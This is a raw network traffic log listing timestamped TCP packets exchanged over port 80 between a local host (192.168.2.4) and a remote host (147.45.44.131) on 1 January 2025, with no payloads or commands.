Jan 1, 2025 08:54:03.198298931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198301077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198312044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198323011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198329926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198333979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198344946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198353052 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198354959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198364973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.198378086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.198399067 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.199028015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.199039936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.199049950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.199059963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.199090004 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.199100971 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201312065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201368093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201379061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201440096 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201455116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201466084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201476097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201534986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201555014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201564074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201575041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201589108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201598883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201617956 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201622009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201641083 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201678038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201690912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201730013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201787949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201798916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201808929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201838017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201850891 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.201937914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201947927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201957941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201967955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.201983929 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202013969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202066898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202083111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202094078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202133894 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202163935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202173948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202183962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202194929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202203989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202208042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202229023 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202240944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202406883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202418089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202428102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202442884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202454090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202456951 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202486992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202495098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202507019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202538967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202626944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202637911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202646971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202656984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202667952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202677011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202683926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202687979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202697992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202703953 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202708006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.202724934 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.202759981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.286931038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.286947012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.286957026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287008047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287018061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287028074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287039042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287126064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287172079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287188053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287239075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287257910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287270069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287303925 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287393093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287404060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287415028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287425041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287436962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287446022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287476063 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287492037 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287575006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287585974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287595987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287606955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287623882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287652016 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287813902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287825108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287836075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287847996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287858009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287863016 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287870884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287880898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.287884951 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.287923098 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288233042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288243055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288253069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288263083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288279057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288280964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288290024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288300037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288300991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288311005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288321018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288331032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288331032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288341045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288355112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288377047 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288398027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288646936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288657904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288700104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288805962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288821936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288831949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288842916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288845062 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288852930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288858891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288867950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288868904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288880110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288888931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288899899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288908958 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288911104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288922071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288933039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288933039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288944006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288949013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.288955927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.288981915 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289001942 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289650917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289660931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289670944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289680958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289690018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289700031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289700985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289710999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289725065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289726019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289736986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289747953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289755106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289758921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289771080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289777040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289783001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289793968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.289803982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289822102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.289846897 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292433023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292443037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292452097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292463064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292473078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292483091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292484999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292494059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292511940 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292525053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292531967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292536020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292571068 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292601109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292610884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292622089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292637110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292645931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292665958 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292763948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292774916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292784929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292794943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292804956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292810917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292848110 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.292970896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292982101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.292998075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293006897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293016911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293025970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293040991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293064117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293224096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293234110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293246984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293256998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293267012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293292046 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293308973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293313026 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293319941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293329954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293339014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293350935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293359995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293368101 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293397903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293570995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293587923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293598890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293610096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293618917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293620110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293631077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293641090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293642044 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293651104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293659925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293668985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293669939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293680906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293689966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.293689966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293709993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.293731928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378047943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378086090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378098011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378142118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378151894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378169060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378170013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378181934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378226995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378374100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378386021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378396034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378405094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378427029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378457069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378529072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378540993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378551960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378561974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378571987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378582001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378592014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378601074 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378609896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378628969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378639936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378653049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378673077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.378907919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378973007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378983021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.378993988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379004955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379029036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379074097 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379113913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379126072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379134893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379160881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379173040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379390001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379400969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379410028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379420042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379430056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379440069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379445076 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379451036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379462004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379506111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379523039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379697084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379708052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379719019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379734039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379740953 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379745960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379756927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379766941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379776001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379780054 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379815102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379826069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379828930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379841089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379851103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379861116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379869938 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379870892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379882097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379893064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379904032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.379909992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.379947901 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380630970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380641937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380646944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380656004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380666971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380676985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380686045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380691051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380697012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380697012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380706072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380717039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380721092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380728006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380737066 CET	80	49730	147.45.44.131	192.168.2.4
